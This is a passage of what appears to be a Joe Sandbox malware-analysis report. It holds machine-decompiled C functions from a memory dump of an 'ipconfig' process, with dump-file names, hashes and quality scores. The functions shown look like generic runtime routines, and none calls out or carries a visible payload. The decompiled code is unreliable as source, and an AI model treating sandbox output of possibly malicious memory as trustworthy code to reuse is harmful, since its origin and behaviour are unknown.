              						E02EAFFB0(_t62, _t80, _t82);
              						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
              						_t30 = _t80 + 0xd0; // 0xd0
              						_t83 = _t30;
              						E02F68833(_t83,  &_v16);
              						_t81 = _t80 + 0x90;
              						E02EAFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
              						_t63 = 0;
              						_push(0);
              						_push(_t83);
              						_t48 = E02EDB180();
              						if(_a4 != 0) {
              							E02EB2280(_t48, _t81);
              						}
              					} else {
              						_t69 = _v8;
              						_t12 = _t80 + 0x98; // 0x98
              						_t13 = _t69 + 0xc; // 0x575651ff
              						E02EBBB2D(_t13, _t12);
              						_t71 = _v8;
              						_t15 = _t80 + 0xb0; // 0xb0
              						_t16 = _t71 + 8; // 0x8b000cc2
              						E02EBBB2D(_t16, _t15);
              						E02EBB944(_v8, _t62);
              						 *((char*)(_t80 + 0xdc)) = 0;
              						E02EAFFB0(0, _t80, _t82);
              						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
              						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
              						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
              						 *(_t80 + 0xde) = 0;
              						if(_a4 == 0) {
              							_t25 = _t80 + 0x90; // 0x90
              							E02EAFFB0(0, _t80, _t25);
              						}
              						_t63 = 1;
              					}
              					return _t63;
              				}
              				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
              				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
              				if(_a4 == 0) {
              					_t24 = _t80 + 0x90; // 0x90
              					E02EAFFB0(0, __ecx, _t24);
              				}
              				return 0;
              			}

















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
              • Instruction ID: 2acc515bd79ed6b5f6c1471c88f88f4f422c064b32871ba6ab0b466dd02086b9
              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
              • Instruction Fuzzy Hash: 3B317771A85546BED706EBB0C890BEAF765BF42348F14E15BE51C9B200DB356A09CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 70%
              			E02F43D40(intOrPtr __ecx, char* __edx) {
              				signed int _v8;
              				char* _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				signed char _v24;
              				char _v28;
              				char _v29;
              				intOrPtr* _v32;
              				char _v36;
              				char _v37;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed char _t34;
              				intOrPtr* _t37;
              				intOrPtr* _t42;
              				intOrPtr* _t47;
              				intOrPtr* _t48;
              				intOrPtr* _t49;
              				char _t51;
              				void* _t52;
              				intOrPtr* _t53;
              				char* _t55;
              				char _t59;
              				char* _t61;
              				intOrPtr* _t64;
              				void* _t65;
              				char* _t67;
              				void* _t68;
              				signed int _t70;
              
              				_t62 = __edx;
              				_t72 = (_t70 & 0xfffffff8) - 0x1c;
              				_v8 =  *0x2f8d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
              				_t34 =  &_v28;
              				_v20 = __ecx;
              				_t67 = __edx;
              				_v24 = _t34;
              				_t51 = 0;
              				_v12 = __edx;
              				_v29 = 0;
              				_v28 = _t34;
              				E02EB2280(_t34, 0x2f88a6c);
              				_t64 =  *0x2f85768; // 0x77ad5768
              				if(_t64 != 0x2f85768) {
              					while(1) {
              						_t8 = _t64 + 8; // 0x77ad5770
              						_t42 = _t8;
              						_t53 = _t64;
              						 *_t42 =  *_t42 + 1;
              						_v16 = _t42;
              						E02EAFFB0(_t53, _t64, 0x2f88a6c);
              						 *0x2f8b1e0(_v24, _t67);
              						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
              							_v37 = 1;
              						}
              						E02EB2280(_t45, 0x2f88a6c);
              						_t47 = _v28;
              						_t64 =  *_t64;
              						 *_t47 =  *_t47 - 1;
              						if( *_t47 != 0) {
              							goto L8;
              						}
              						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
              							L10:
              							_push(3);
              							asm("int 0x29");
              						} else {
              							_t48 =  *((intOrPtr*)(_t53 + 4));
              							if( *_t48 != _t53) {
              								goto L10;
              							} else {
              								 *_t48 = _t64;
              								_t61 =  &_v36;
              								 *((intOrPtr*)(_t64 + 4)) = _t48;
              								_t49 = _v32;
              								if( *_t49 != _t61) {
              									goto L10;
              								} else {
              									 *_t53 = _t61;
              									 *((intOrPtr*)(_t53 + 4)) = _t49;
              									 *_t49 = _t53;
              									_v32 = _t53;
              									goto L8;
              								}
              							}
              						}
              						L11:
              						_t51 = _v29;
              						goto L12;
              						L8:
              						if(_t64 != 0x2f85768) {
              							_t67 = _v20;
              							continue;
              						}
              						goto L11;
              					}
              				}
              				L12:
              				E02EAFFB0(_t51, _t64, 0x2f88a6c);
              				while(1) {
              					_t37 = _v28;
              					_t55 =  &_v28;
              					if(_t37 == _t55) {
              						break;
              					}
              					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
              						goto L10;
              					} else {
              						_t59 =  *_t37;
              						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
              							goto L10;
              						} else {
              							_t62 =  &_v28;
              							_v28 = _t59;
              							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
              							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
              							continue;
              						}
              					}
              					L18:
              				}
              				_pop(_t65);
              				_pop(_t68);
              				_pop(_t52);
              				return E02EDB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
              				goto L18;
              			}


































              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 08bcd6d1f677a07777a157392c7d9366d2de49b6642e094b6719f1f4b7852cea
              • Instruction ID: 258312eb657f60cbebe3a4e9d4cae6d25f70de2e80230cf3ffbdb8bc290c807f
              • Opcode Fuzzy Hash: 08bcd6d1f677a07777a157392c7d9366d2de49b6642e094b6719f1f4b7852cea
              • Instruction Fuzzy Hash: F4316871946305DFCB10DF14C88055ABFE1BF85684F5589AEF5998B240DB70D908CB92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 92%
              			E02ECA70E(intOrPtr* __ecx, char* __edx) {
              				unsigned int _v8;
              				intOrPtr* _v12;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t16;
              				intOrPtr _t17;
              				intOrPtr _t28;
              				char* _t33;
              				intOrPtr _t37;
              				intOrPtr _t38;
              				void* _t50;
              				intOrPtr _t52;
              
              				_push(__ecx);
              				_push(__ecx);
              				_t52 =  *0x2f87b10; // 0x8
              				_t33 = __edx;
              				_t48 = __ecx;
              				_v12 = __ecx;
              				if(_t52 == 0) {
              					 *0x2f87b10 = 8;
              					 *0x2f87b14 = 0x2f87b0c;
              					 *0x2f87b18 = 1;
              					L6:
              					_t2 = _t52 + 1; // 0x9
              					E02ECA990(0x2f87b10, _t2, 7);
              					asm("bts ecx, eax");
              					 *_t48 = _t52;
              					 *_t33 = 1;
              					L3:
              					_t16 = 0;
              					L4:
              					return _t16;
              				}
              				_t17 = L02ECA840(__edx, __ecx, __ecx, _t52, 0x2f87b10, 1, 0);
              				if(_t17 == 0xffffffff) {
              					_t37 =  *0x2f87b10; // 0x8
              					_t3 = _t37 + 0x27; // 0x2f
              					__eflags = _t3 >> 5 -  *0x2f87b18; // 0x1
              					if(__eflags > 0) {
              						_t38 =  *0x2f87b9c; // 0x0
              						_t4 = _t52 + 0x27; // 0x2f
              						_v8 = _t4 >> 5;
              						_t50 = L02EB4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
              						__eflags = _t50;
              						if(_t50 == 0) {
              							_t16 = 0xc0000017;
              							goto L4;
              						}
              						 *0x2f87b18 = _v8;
              						_t8 = _t52 + 7; // 0xf
              						E02EDF3E0(_t50,  *0x2f87b14, _t8 >> 3);
              						_t28 =  *0x2f87b14; // 0x77ad7b0c
              						__eflags = _t28 - 0x2f87b0c;
              						if(_t28 != 0x2f87b0c) {
              							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
              						}
              						_t9 = _t52 + 8; // 0x10
              						 *0x2f87b14 = _t50;
              						_t48 = _v12;
              						 *0x2f87b10 = _t9;
              						goto L6;
              					}
              					 *0x2f87b10 = _t37 + 8;
              					goto L6;
              				}
              				 *__ecx = _t17;
              				 *_t33 = 0;
              				goto L3;
              			}

















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1b6b18b7f7f57c95717258fdc5f2e3664603d50511c768609930a65d5b9920e7
              • Instruction ID: 32b4ee7be40b754897980e8bc3f927d7503568a4cc0ce6d30969feb658356e95
              • Opcode Fuzzy Hash: 1b6b18b7f7f57c95717258fdc5f2e3664603d50511c768609930a65d5b9920e7
              • Instruction Fuzzy Hash: CC31D0B9A802089BC711EF58DD90F69F7FAFB84798F248D69E11587344D3709912CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 95%
              			E02E9AA16(signed short* __ecx) {
              				signed int _v8;
              				intOrPtr _v12;
              				signed short _v16;
              				intOrPtr _v20;
              				signed short _v24;
              				signed short _v28;
              				void* _v32;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t25;
              				signed short _t38;
              				signed short* _t42;
              				signed int _t44;
              				signed short* _t52;
              				signed short _t53;
              				signed int _t54;
              
              				_v8 =  *0x2f8d360 ^ _t54;
              				_t42 = __ecx;
              				_t44 =  *__ecx & 0x0000ffff;
              				_t52 =  &(__ecx[2]);
              				_t51 = _t44 + 2;
              				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
              					L4:
              					_t25 =  *0x2f87b9c; // 0x0
              					_t53 = L02EB4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
              					__eflags = _t53;
              					if(_t53 == 0) {
              						L3:
              						return E02EDB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
              					} else {
              						E02EDF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
              						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
              						L2:
              						_t51 = 4;
              						if(L02EA6C59(_t53, _t51, _t58) != 0) {
              							_t28 = E02EC5E50(0x2e7c338, 0, 0,  &_v32);
              							__eflags = _t28;
              							if(_t28 == 0) {
              								_t38 = ( *_t42 & 0x0000ffff) + 2;
              								__eflags = _t38;
              								_v24 = _t53;
              								_v16 = _t38;
              								_v20 = 0;
              								_v12 = 0;
              								E02ECB230(_v32, _v28, 0x2e7c2d8, 1,  &_v24);
              								_t28 = E02E9F7A0(_v32, _v28);
              							}
              							__eflags = _t53 -  *_t52;
              							if(_t53 !=  *_t52) {
              								_t28 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
              							}
              						}
              						goto L3;
              					}
              				}
              				_t53 =  *_t52;
              				_t44 = _t44 >> 1;
              				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
              				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
              					goto L4;
              				}
              				goto L2;
              			}





















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fe922660f88236cbff89e8ad481131adbe227020d811380b3e1894d8de067b62
              • Instruction ID: 0cb931c9aed29e35ce5d2b3f06845f947b8751db5a41ab94647497bd95fac96b
              • Opcode Fuzzy Hash: fe922660f88236cbff89e8ad481131adbe227020d811380b3e1894d8de067b62
              • Instruction Fuzzy Hash: 5A31F571A80219ABDF11EF64CD81ABFB3B9EF04704F11946AF905EB290E7749D11CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 97%
              			E02EC61A0(signed int* __ecx) {
              				intOrPtr _v8;
              				char _v12;
              				intOrPtr* _v16;
              				intOrPtr _v20;
              				intOrPtr _t30;
              				intOrPtr _t31;
              				void* _t32;
              				intOrPtr _t33;
              				intOrPtr _t37;
              				intOrPtr _t49;
              				signed int _t51;
              				intOrPtr _t52;
              				signed int _t54;
              				void* _t59;
              				signed int* _t61;
              				intOrPtr* _t64;
              
              				_t61 = __ecx;
              				_v12 = 0;
              				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
              				_v16 = __ecx;
              				_v8 = 0;
              				if(_t30 == 0) {
              					L6:
              					_t31 = 0;
              					L7:
              					return _t31;
              				}
              				_t32 = _t30 + 0x5d8;
              				if(_t32 == 0) {
              					goto L6;
              				}
              				_t59 = _t32 + 0x30;
              				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
              					goto L6;
              				}
              				if(__ecx != 0) {
              					 *((intOrPtr*)(__ecx)) = 0;
              					 *((intOrPtr*)(__ecx + 4)) = 0;
              				}
              				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
              					_t51 =  *(_t32 + 0x10);
              					_t33 = _t32 + 0x10;
              					_v20 = _t33;
              					_t54 =  *(_t33 + 4);
              					if((_t51 | _t54) == 0) {
              						_t37 = E02EC5E50(0x2e767cc, 0, 0,  &_v12);
              						if(_t37 != 0) {
              							goto L6;
              						}
              						_t52 = _v8;
              						asm("lock cmpxchg8b [esi]");
              						_t64 = _v16;
              						_t49 = _t37;
              						_v20 = 0;
              						if(_t37 == 0) {
              							if(_t64 != 0) {
              								 *_t64 = _v12;
              								 *((intOrPtr*)(_t64 + 4)) = _t52;
              							}
              							E02F69D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
              							_t31 = 1;
              							goto L7;
              						}
              						E02E9F7C0(_t52, _v12, _t52, 0);
              						if(_t64 != 0) {
              							 *_t64 = _t49;
              							 *((intOrPtr*)(_t64 + 4)) = _v20;
              						}
              						L12:
              						_t31 = 1;
              						goto L7;
              					}
              					if(_t61 != 0) {
              						 *_t61 = _t51;
              						_t61[1] = _t54;
              					}
              					goto L12;
              				} else {
              					goto L6;
              				}
              			}




















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5192519c0a8377e5a0babe794a568242200aad199824d2e94b3c4a6f558d3891
              • Instruction ID: 185181f711579e66c411230efa2deb7819c697cf21f88c8c220a8f49f0f8eeb2
              • Opcode Fuzzy Hash: 5192519c0a8377e5a0babe794a568242200aad199824d2e94b3c4a6f558d3891
              • Instruction Fuzzy Hash: FB31A071A057018FD720DF59C940B27F7E9FB88B44F14896DE99997391D770E804CB92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 58%
              			E02ED4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
              				signed int _v8;
              				signed int* _v12;
              				char _v13;
              				signed int _v16;
              				char _v21;
              				signed int* _v24;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t29;
              				signed int* _t32;
              				signed int* _t41;
              				signed int _t42;
              				void* _t43;
              				intOrPtr* _t51;
              				void* _t52;
              				signed int _t53;
              				signed int _t58;
              				void* _t59;
              				signed int _t60;
              				signed int _t62;
              
              				_t49 = __edx;
              				_t62 = (_t60 & 0xfffffff8) - 0xc;
              				_t26 =  *0x2f8d360 ^ _t62;
              				_v8 =  *0x2f8d360 ^ _t62;
              				_t41 = __ecx;
              				_t51 = __edx;
              				_v12 = __ecx;
              				if(_a4 == 0) {
              					if(_a8 != 0) {
              						goto L1;
              					}
              					_v13 = 1;
              					E02EB2280(_t26, 0x2f88608);
              					_t58 =  *_t41;
              					if(_t58 == 0) {
              						L11:
              						E02EAFFB0(_t41, _t51, 0x2f88608);
              						L2:
              						 *0x2f8b1e0(_a4, _a8);
              						_t42 =  *_t51();
              						if(_t42 == 0) {
              							_t29 = 0;
              							L5:
              							_pop(_t52);
              							_pop(_t59);
              							_pop(_t43);
              							return E02EDB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
              						}
              						 *((intOrPtr*)(_t42 + 0x34)) = 1;
              						if(_v21 != 0) {
              							_t53 = 0;
              							E02EB2280(_t28, 0x2f88608);
              							_t32 = _v24;
              							if( *_t32 == _t58) {
              								 *_t32 = _t42;
              								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
              								if(_t58 != 0) {
              									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
              									asm("sbb edi, edi");
              									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
              								}
              							}
              							E02EAFFB0(_t42, _t53, 0x2f88608);
              							if(_t53 != 0) {
              								L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
              							}
              						}
              						_t29 = _t42;
              						goto L5;
              					}
              					if( *((char*)(_t58 + 0x40)) != 0) {
              						L10:
              						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
              						E02EAFFB0(_t41, _t51, 0x2f88608);
              						_t29 = _t58;
              						goto L5;
              					}
              					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
              					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
              						goto L11;
              					}
              					goto L10;
              				}
              				L1:
              				_v13 = 0;
              				_t58 = 0;
              				goto L2;
              			}

























              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dcc160a832516943df0d2b878743f791eef5fc261db3c76eca55736663ec876b
              • Instruction ID: 2cb3ad7d20f97ed47bba2107b4d575c23d630fe7fc6167bc9208f8f72feaf9cb
              • Opcode Fuzzy Hash: dcc160a832516943df0d2b878743f791eef5fc261db3c76eca55736663ec876b
              • Instruction Fuzzy Hash: 473134326813509FDB31AF14C980B2AF7E5FF94748F40A529E9564B680EB70E801DF85
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E02ED8EC7(void* __ecx, void* __edx) {
              				signed int _v8;
              				signed int* _v16;
              				intOrPtr _v20;
              				signed int* _v24;
              				char* _v28;
              				signed int* _v32;
              				intOrPtr _v36;
              				signed int* _v40;
              				signed int* _v44;
              				signed int* _v48;
              				intOrPtr _v52;
              				signed int* _v56;
              				signed int* _v60;
              				signed int* _v64;
              				intOrPtr _v68;
              				signed int* _v72;
              				char* _v76;
              				signed int* _v80;
              				signed int _v84;
              				signed int* _v88;
              				intOrPtr _v92;
              				signed int* _v96;
              				intOrPtr _v100;
              				signed int* _v104;
              				signed int* _v108;
              				char _v140;
              				signed int _v144;
              				signed int _v148;
              				signed int* _v152;
              				char _v156;
              				signed int* _v160;
              				char _v164;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t67;
              				intOrPtr _t70;
              				void* _t71;
              				void* _t72;
              				signed int _t73;
              
              				_t69 = __edx;
              				_v8 =  *0x2f8d360 ^ _t73;
              				_t48 =  *[fs:0x30];
              				_t72 = __edx;
              				_t71 = __ecx;
              				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
              					_t48 = E02EC4E70(0x2f886e4, 0x2ed9490, 0, 0);
              					if( *0x2f853e8 > 5 && E02ED8F33(0x2f853e8, 0, 0x2000) != 0) {
              						_v156 =  *((intOrPtr*)(_t71 + 0x44));
              						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
              						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
              						_v164 =  *((intOrPtr*)(_t72 + 0x58));
              						_v108 =  &_v84;
              						_v92 =  *((intOrPtr*)(_t71 + 0x28));
              						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
              						_v76 =  &_v156;
              						_t70 = 8;
              						_v60 =  &_v144;
              						_t67 = 4;
              						_v44 =  &_v148;
              						_v152 = 0;
              						_v160 = 0;
              						_v104 = 0;
              						_v100 = 2;
              						_v96 = 0;
              						_v88 = 0;
              						_v80 = 0;
              						_v72 = 0;
              						_v68 = _t70;
              						_v64 = 0;
              						_v56 = 0;
              						_v52 = 0x2f853e8;
              						_v48 = 0;
              						_v40 = 0;
              						_v36 = 0x2f853e8;
              						_v32 = 0;
              						_v28 =  &_v164;
              						_v24 = 0;
              						_v20 = _t70;
              						_v16 = 0;
              						_t69 = 0x2e7bc46;
              						_t48 = E02F17B9C(0x2f853e8, 0x2e7bc46, _t67, 0x2f853e8, _t70,  &_v140);
              					}
              				}
              				return E02EDB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
              			}












































              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ff24cc9ecddc5a028ec37eb457eb6a21a15fb01df8bcc8093010df3ce1ff910c
              • Instruction ID: 5d0a1be70a963b824b8df3daf7364d17da459e35b41e8c22d373eeca80022daa
              • Opcode Fuzzy Hash: ff24cc9ecddc5a028ec37eb457eb6a21a15fb01df8bcc8093010df3ce1ff910c
              • Instruction Fuzzy Hash: 5541A1B1D4031C9FDB24CFAAD980AAEFBF5BB48300F9081AEE519A7640D7705A45CF50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 74%
              			E02ECE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
              				intOrPtr* _v0;
              				signed char _v4;
              				signed int _v8;
              				void* __ecx;
              				void* __ebp;
              				void* _t37;
              				intOrPtr _t38;
              				signed int _t44;
              				signed char _t52;
              				void* _t54;
              				intOrPtr* _t56;
              				void* _t58;
              				char* _t59;
              				signed int _t62;
              
              				_t58 = __edx;
              				_push(0);
              				_push(4);
              				_push( &_v8);
              				_push(0x24);
              				_push(0xffffffff);
              				if(E02ED9670() < 0) {
              					L02EEDF30(_t54, _t58, _t35);
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					_push(_t54);
              					_t52 = _v4;
              					if(_t52 > 8) {
              						_t37 = 0xc0000078;
              					} else {
              						_t38 =  *0x2f87b9c; // 0x0
              						_t62 = _t52 & 0x000000ff;
              						_t59 = L02EB4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
              						if(_t59 == 0) {
              							_t37 = 0xc0000017;
              						} else {
              							_t56 = _v0;
              							 *(_t59 + 1) = _t52;
              							 *_t59 = 1;
              							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
              							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
              							_t44 = _t62 - 1;
              							if(_t44 <= 7) {
              								switch( *((intOrPtr*)(_t44 * 4 +  &M02ECE810))) {
              									case 0:
              										L6:
              										 *((intOrPtr*)(_t59 + 8)) = _a8;
              										goto L7;
              									case 1:
              										L13:
              										 *((intOrPtr*)(__edx + 0xc)) = _a12;
              										goto L6;
              									case 2:
              										L12:
              										 *((intOrPtr*)(__edx + 0x10)) = _a16;
              										goto L13;
              									case 3:
              										L11:
              										 *((intOrPtr*)(__edx + 0x14)) = _a20;
              										goto L12;
              									case 4:
              										L10:
              										 *((intOrPtr*)(__edx + 0x18)) = _a24;
              										goto L11;
              									case 5:
              										L9:
              										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
              										goto L10;
              									case 6:
              										L17:
              										 *((intOrPtr*)(__edx + 0x20)) = _a32;
              										goto L9;
              									case 7:
              										 *((intOrPtr*)(__edx + 0x24)) = _a36;
              										goto L17;
              								}
              							}
              							L7:
              							 *_a40 = _t59;
              							_t37 = 0;
              						}
              					}
              					return _t37;
              				} else {
              					_push(0x20);
              					asm("ror eax, cl");
              					return _a4 ^ _v8;
              				}
              			}


















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3bb6625b54479edd0336bc316a4d7b65765757384481d863d8d84ce4284b5580
              • Instruction ID: 4430905e66c28aeb9cf6a646554048fecb46d60a2167e74ba5b7c25ed480c1b0
              • Opcode Fuzzy Hash: 3bb6625b54479edd0336bc316a4d7b65765757384481d863d8d84ce4284b5580
              • Instruction Fuzzy Hash: 6E319175A54249EFD704CF58C940F9AB7E8FB08314F18926AFA04CB341D631ED91CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 67%
              			E02ECBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				void* __ebx;
              				void* __edi;
              				intOrPtr _t22;
              				intOrPtr* _t41;
              				intOrPtr _t51;
              
              				_t51 =  *0x2f86100; // 0xf
              				_v12 = __edx;
              				_v8 = __ecx;
              				if(_t51 >= 0x800) {
              					L12:
              					return 0;
              				} else {
              					goto L1;
              				}
              				while(1) {
              					L1:
              					_t22 = _t51;
              					asm("lock cmpxchg [ecx], edx");
              					if(_t51 == _t22) {
              						break;
              					}
              					_t51 = _t22;
              					if(_t22 < 0x800) {
              						continue;
              					}
              					goto L12;
              				}
              				E02EB2280(0xd, 0xed9f1a0);
              				_t41 =  *0x2f860f8; // 0x0
              				if(_t41 != 0) {
              					 *0x2f860f8 =  *_t41;
              					 *0x2f860fc =  *0x2f860fc + 0xffff;
              				}
              				E02EAFFB0(_t41, 0x800, 0xed9f1a0);
              				if(_t41 != 0) {
              					L6:
              					asm("movsd");
              					asm("movsd");
              					asm("movsd");
              					asm("movsd");
              					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
              					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
              					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
              					do {
              						asm("lock xadd [0x2f860f0], ax");
              						 *((short*)(_t41 + 0x34)) = 1;
              					} while (1 == 0);
              					goto L8;
              				} else {
              					_t41 = L02EB4620(0x2f86100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
              					if(_t41 == 0) {
              						L11:
              						asm("lock dec dword [0x2f86100]");
              						L8:
              						return _t41;
              					}
